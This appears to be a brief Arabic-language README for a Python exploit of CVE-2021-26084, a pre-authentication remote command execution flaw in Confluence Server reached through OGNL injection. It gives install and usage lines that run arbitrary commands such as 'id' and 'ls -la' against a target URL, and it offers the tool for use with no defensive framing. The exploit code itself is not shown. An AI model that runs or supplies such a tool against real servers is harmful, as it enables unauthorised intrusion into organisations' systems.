
استغلال Python لثغرة CVE-2021-26084 التي تستهدف تنفيذ الأوامر عن بُعد قبل المصادقة في Confluence Server عبر حقن OGNL. ينفّذ أوامر عشوائية على الأنظمة المستهدفة القابلة للاستغلال.
CVE-2021-26084 - ثغرة تنفيذ أوامر (RCE) قبل المصادقة في Confluence | حقن OGNL
pip3 install -r requirements.txt
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'